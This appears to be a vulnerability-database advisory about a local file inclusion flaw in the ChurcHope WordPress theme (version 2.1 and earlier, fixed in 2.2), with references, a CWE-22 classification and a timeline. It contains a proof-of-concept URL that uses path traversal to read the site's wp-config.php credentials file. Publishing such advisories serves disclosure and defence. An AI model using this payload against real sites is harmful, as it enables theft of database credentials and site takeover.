ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)



Description
The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
Proof of Concept
http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

Affects Theme

fixed in version 2.2

References

URL https://themeforest.net/item/churchope-responsive-wordpress-theme/2708562?s_rank=1
URL https://templateinvaders.com/changelogs/churchope-responsive-wordpress-theme-changelog/
URL https://themeforest.net/item/churchope-responsive-wordpress-theme/2708562/comments?page=97

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Justin Smith
Views 5144
Verified No
WPVDB ID 7710

Timeline

Publicly Published 2014-12-07 (over 4 years ago)
Added 2014-12-07 (over 4 years ago)
Last Updated 2018-08-05 (about 1 year ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin